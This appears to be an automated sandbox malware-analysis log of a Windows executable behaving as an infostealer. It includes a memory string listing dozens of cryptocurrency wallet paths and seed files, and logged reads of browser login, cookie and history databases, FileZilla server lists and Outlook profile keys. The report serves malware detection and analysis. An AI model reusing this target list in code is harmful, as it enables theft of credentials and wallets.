Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: Yara match File source: 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: YEnIrzZUUw.exe PID: 7428, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.4190e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.YEnIrzZUUw.exe.5b70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.YEnIrzZUUw.exe.5b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.4190e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2243889460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2245886678.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1690988607.0000000005B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2246016069.00000000041FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: YEnIrzZUUw.exe PID: 7428, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.4190e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.YEnIrzZUUw.exe.5b70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.4190e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.YEnIrzZUUw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.YEnIrzZUUw.exe.5b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2243889460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2245886678.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1690988607.0000000005B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: YEnIrzZUUw.exe PID: 7428, type: MEMORYSTR
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6CAD0C40 sqlite3_bind_zeroblob, 0_2_6CAD0C40
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00531390 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 7_2_00531390
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00532D60 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 7_2_00532D60
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs